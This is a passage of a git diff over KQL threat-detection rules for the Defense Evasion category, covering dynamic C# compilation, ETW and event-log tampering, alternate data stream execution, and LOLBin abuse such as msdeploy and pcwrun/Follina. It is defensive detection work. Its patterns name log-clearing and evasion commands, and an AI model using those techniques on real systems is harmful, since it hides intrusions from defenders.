C# code, but can do so without touching disk. -// This can be used to unpack a payload for execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.004 - -DeviceFileEvents +// Title: Dynamic CSharp Compile Artefact +// Author: frack113 +// Date: 2022-01-09 +// Level: low +// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process. +// Certain processes are not typically observed compiling C# code, but can do so without touching disk. +// This can be used to unpack a payload for execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004 + +DeviceFileEvents | where FolderPath endswith ".cmdline" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql b/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql index 9ab0a135..7e212732 100644 --- a/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql +++ b/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql @@ -1,14 +1,14 @@ -// Title: Dynamic .NET Compilation Via Csc.EXE -// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2019-08-24 -// Level: medium -// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.004 -// False Positives: -// - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897 -// - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962 -// - Ansible - -DeviceProcessEvents +// Title: Dynamic .NET Compilation Via Csc.EXE +// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2019-08-24 +// Level: medium +// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004 +// False Positives: +// - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897 +// - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962 +// - Ansible + +DeviceProcessEvents | where FolderPath endswith "\\csc.exe" and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp\\") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) or ProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or (InitiatingProcessFolderPath in~ ("C:\\ProgramData\\chocolatey\\choco.exe", "C:\\ProgramData\\chocolatey\\tools\\shimgen.exe")) or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql b/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql index 75b3547f..5ce08bb7 100644 --- a/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql +++ b/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql @@ -1,12 +1,12 @@ -// Title: Enable Local Manifest Installation With Winget -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-17 -// Level: medium -// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence -// False Positives: -// - Administrators or developers might enable this for testing purposes or to install custom private packages - -DeviceRegistryEvents +// Title: Enable Local Manifest Installation With Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: medium +// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence +// False Positives: +// - Administrators or developers might enable this for testing purposes or to install custom private packages + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql b/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql index 78ab8562..5dfcfa6a 100644 --- a/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql +++ b/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql @@ -1,12 +1,12 @@ -// Title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback -// Author: X__Junior (Nextron Systems) -// Date: 2023-11-03 -// Level: medium -// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Administrative activity - -DeviceRegistryEvents +// Title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback +// Author: X__Junior (Nextron Systems) +// Date: 2023-11-03 +// Level: medium +// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrative activity + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql b/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql index 4edd6106..a3d551ad 100644 --- a/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql +++ b/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql @@ -1,12 +1,12 @@ -// Title: ESXi Syslog Configuration Change Via ESXCLI -// Author: Cedric Maurugeon -// Date: 2023-09-04 -// Level: medium -// Description: Detects changes to the ESXi syslog configuration via "esxcli" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1562.001, attack.t1562.003, attack.t1059.012 -// False Positives: -// - Legitimate administrative activities - -DeviceProcessEvents +// Title: ESXi Syslog Configuration Change Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects changes to the ESXi syslog configuration via "esxcli" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1562.001, attack.t1562.003, attack.t1059.012 +// False Positives: +// - Legitimate administrative activities + +DeviceProcessEvents | where ProcessCommandLine contains " set" and (ProcessCommandLine contains "system" and ProcessCommandLine contains "syslog" and ProcessCommandLine contains "config") and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql index d3c5200a..046358e9 100644 --- a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql +++ b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql @@ -1,13 +1,13 @@ -// Title: ETW Logging Tamper In .NET Processes Via CommandLine -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-05-02 -// Level: high -// Description: Detects changes to environment variables related to ETW logging via the CommandLine. -// This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: ETW Logging Tamper In .NET Processes Via CommandLine +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: high +// Description: Detects changes to environment variables related to ETW logging via the CommandLine. +// This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "COMPlus_ETWEnabled" or ProcessCommandLine contains "COMPlus_ETWFlags" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql index 24ad5313..e50564d9 100644 --- a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql +++ b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql @@ -1,10 +1,10 @@ -// Title: ETW Trace Evasion Activity -// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2019-03-22 -// Level: high -// Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070, attack.t1562.006, car.2016-04-002 - -DeviceProcessEvents +// Title: ETW Trace Evasion Activity +// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2019-03-22 +// Level: high +// Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.t1562.006, car.2016-04-002 + +DeviceProcessEvents | where (ProcessCommandLine contains "cl" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "clear-log" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "sl" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "set-log" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "logman" and ProcessCommandLine contains "update" and ProcessCommandLine contains "trace" and ProcessCommandLine contains "--p" and ProcessCommandLine contains "-ets") or ProcessCommandLine contains "Remove-EtwTraceProvider" or (ProcessCommandLine contains "Set-EtwTraceProvider" and ProcessCommandLine contains "0x11") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql b/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql index 492a3cc1..93c139c6 100644 --- a/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql +++ b/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql @@ -1,10 +1,10 @@ -// Title: EventLog EVTX File Deleted -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-15 -// Level: medium -// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 - -DeviceFileEvents +// Title: EventLog EVTX File Deleted +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: medium +// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 + +DeviceFileEvents | where FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql index 6178d35d..2d878958 100644 --- a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql +++ b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql @@ -1,15 +1,15 @@ -// Title: EVTX Created In Uncommon Location -// Author: D3F7A5105 -// Date: 2023-01-02 -// Level: medium -// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. -// This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. -// Note that backup software and legitimate administrator might perform similar actions during troubleshooting. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 -// False Positives: -// - Administrator or backup activity -// - An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files - -DeviceFileEvents +// Title: EVTX Created In Uncommon Location +// Author: D3F7A5105 +// Date: 2023-01-02 +// Level: medium +// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. +// This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. +// Note that backup software and legitimate administrator might perform similar actions during troubleshooting. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - Administrator or backup activity +// - An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files + +DeviceFileEvents | where FolderPath endswith ".evtx" and (not(((FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\") or FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql b/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql index 2747b280..c9c09a88 100644 --- a/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql +++ b/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql @@ -1,12 +1,12 @@ -// Title: Exchange PowerShell Cmdlet History Deleted -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-26 -// Level: high -// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 -// False Positives: -// - Possible FP during log rotation - -DeviceFileEvents +// Title: Exchange PowerShell Cmdlet History Deleted +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-26 +// Level: high +// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - Possible FP during log rotation + +DeviceFileEvents | where FolderPath contains "_Cmdlet_" and FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql b/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql index c56afa86..b556e4c3 100644 --- a/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql +++ b/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql @@ -1,12 +1,12 @@ -// Title: Execute Files with Msdeploy.exe -// Author: Beyu Denis, oscd.community -// Date: 2020-10-18 -// Level: medium -// Description: Detects file execution using the msdeploy.exe lolbin -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - System administrator Usage - -DeviceProcessEvents +// Title: Execute Files with Msdeploy.exe +// Author: Beyu Denis, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects file execution using the msdeploy.exe lolbin +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - System administrator Usage + +DeviceProcessEvents | where (ProcessCommandLine contains "verb:sync" and ProcessCommandLine contains "-source:RunCommand" and ProcessCommandLine contains "-dest:runCommand") and FolderPath endswith "\\msdeploy.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql b/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql index 762f9ccb..fd3ac9b2 100644 --- a/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql +++ b/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql @@ -1,10 +1,10 @@ -// Title: Execute From Alternate Data Streams -// Author: frack113 -// Date: 2021-09-01 -// Level: medium -// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004 - -DeviceProcessEvents +// Title: Execute From Alternate Data Streams +// Author: frack113 +// Date: 2021-09-01 +// Level: medium +// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents | where ProcessCommandLine contains "txt:" and ((ProcessCommandLine contains "esentutl " and ProcessCommandLine contains " /y " and ProcessCommandLine contains " /d " and ProcessCommandLine contains " /o ") or (ProcessCommandLine contains "makecab " and ProcessCommandLine contains ".cab") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains " export ") or (ProcessCommandLine contains "regedit " and ProcessCommandLine contains " /E ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > ")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql b/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql index 39609343..f1cd71f7 100644 --- a/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql +++ b/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql @@ -1,12 +1,12 @@ -// Title: Execute Pcwrun.EXE To Leverage Follina -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-13 -// Level: high -// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.execution -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Execute Pcwrun.EXE To Leverage Follina +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-13 +// Level: high +// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql b/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql index 1919c3e5..8cb98ccc 100644 --- a/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql +++ b/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql @@ -1,10 +1,10 @@ -// Title: Execution DLL of Choice Using WAB.EXE -// Author: oscd.community, Natalia Shornikova -// Date: 2020-10-13 -// Level: high -// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceRegistryEvents +// Title: Execution DLL of Choice Using WAB.EXE +// Author: oscd.community, Natalia Shornikova +// Date: 2020-10-13 +// Level: high +// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceRegistryEvents | where RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath" and (not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql b/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql index 7da04081..1e12eb9f 100644 --- a/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql +++ b/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql @@ -1,10 +1,10 @@ -// Title: Execution Of Non-Existing File -// Author: Max Altgelt (Nextron Systems) -// Date: 2021-12-09 -// Level: high -// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Execution Of Non-Existing File +// Author: Max Altgelt (Nextron Systems) +// Date: 2021-12-09 +// Level: high +// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (not(FolderPath contains "\\")) and (not((((FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or (ProcessCommandLine in~ ("Registry", "MemCompression", "vmmem"))) or (FolderPath in~ ("-", "")) or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql index eee3239b..0b080057 100644 --- a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql +++ b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql @@ -1,11 +1,11 @@ -// Title: Execution of Suspicious File Type Extension -// Author: Max Altgelt (Nextron Systems) -// Date: 2021-12-09 -// Level: medium -// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. -// This rule might require some initial baselining to align with some third party tooling in the user environment. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Execution of Suspicious File Type Extension +// Author: Max Altgelt (Nextron Systems) +// Date: 2021-12-09 +// Level: medium +// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. +// This rule might require some initial baselining to align with some third party tooling in the user environment. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (not((FolderPath endswith ".bin" or FolderPath endswith ".cgi" or FolderPath endswith ".com" or FolderPath endswith ".exe" or FolderPath endswith ".scr" or FolderPath endswith ".tmp"))) and (not((FolderPath contains ":\\$Extend\\$Deleted\\" or FolderPath contains ":\\Windows\\System32\\DriverStore\\FileRepository\\" or (FolderPath in~ ("-", "")) or (FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or FolderPath contains ":\\Windows\\Installer\\MSI" or (FolderPath contains ":\\Config.Msi\\" and (FolderPath endswith ".rbf" or FolderPath endswith ".rbs")) or isnull(FolderPath) or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\")))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Avira\\" or (FolderPath endswith "com.docker.service" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe") or FolderPath contains ":\\Program Files\\Mozilla Firefox\\" or FolderPath endswith "\\LZMA_EXE" or (FolderPath endswith ":\\Program Files (x86)\\MyQ\\Server\\pcltool.dll" or FolderPath endswith ":\\Program Files\\MyQ\\Server\\pcltool.dll") or (FolderPath contains "NVIDIA\\NvBackend\\" and FolderPath endswith ".dat") or ((FolderPath contains ":\\Program Files (x86)\\WINPAKPRO\\" or FolderPath contains ":\\Program Files\\WINPAKPRO\\") and FolderPath endswith ".ngn") or (FolderPath contains "\\AppData\\Local\\Packages\\" and FolderPath contains "\\LocalState\\rootfs\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql b/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql index a2492d3d..7ae58432 100644 --- a/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql +++ b/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql @@ -1,12 +1,12 @@ -// Title: Execution via stordiag.exe -// Author: Austin Songer (@austinsonger) -// Date: 2021-10-21 -// Level: high -// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate usage of stordiag.exe. - -DeviceProcessEvents +// Title: Execution via stordiag.exe +// Author: Austin Songer (@austinsonger) +// Date: 2021-10-21 +// Level: high +// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of stordiag.exe. + +DeviceProcessEvents | where ((FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\fltmc.exe") and InitiatingProcessFolderPath endswith "\\stordiag.exe") and (not((InitiatingProcessFolderPath startswith "c:\\windows\\system32\\" or InitiatingProcessFolderPath startswith "c:\\windows\\syswow64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql b/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql index cd379a4a..969d8c96 100644 --- a/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql +++ b/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql @@ -1,12 +1,12 @@ -// Title: Execution via WorkFolders.exe -// Author: Maxime Thiebaut (@0xThiebaut) -// Date: 2021-10-21 -// Level: high -// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate usage of the uncommon Windows Work Folders feature. - -DeviceProcessEvents +// Title: Execution via WorkFolders.exe +// Author: Maxime Thiebaut (@0xThiebaut) +// Date: 2021-10-21 +// Level: high +// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of the uncommon Windows Work Folders feature. + +DeviceProcessEvents | where (FolderPath endswith "\\control.exe" and InitiatingProcessFolderPath endswith "\\WorkFolders.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\control.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql index d4a193d3..0312650f 100644 --- a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql +++ b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql @@ -1,11 +1,11 @@ -// Title: Explorer Process Tree Break -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber -// Date: 2019-06-29 -// Level: medium -// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, -// which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Explorer Process Tree Break +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber +// Date: 2019-06-29 +// Level: medium +// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, +// which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where ProcessCommandLine contains "/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}" or (ProcessCommandLine contains "explorer.exe" and (ProcessCommandLine contains " -root," or ProcessCommandLine contains " /root," or ProcessCommandLine contains " –root," or ProcessCommandLine contains " —root," or ProcessCommandLine contains " ―root,")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql index 553e9771..92b81623 100644 --- a/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql +++ b/KQL/rules/Defense 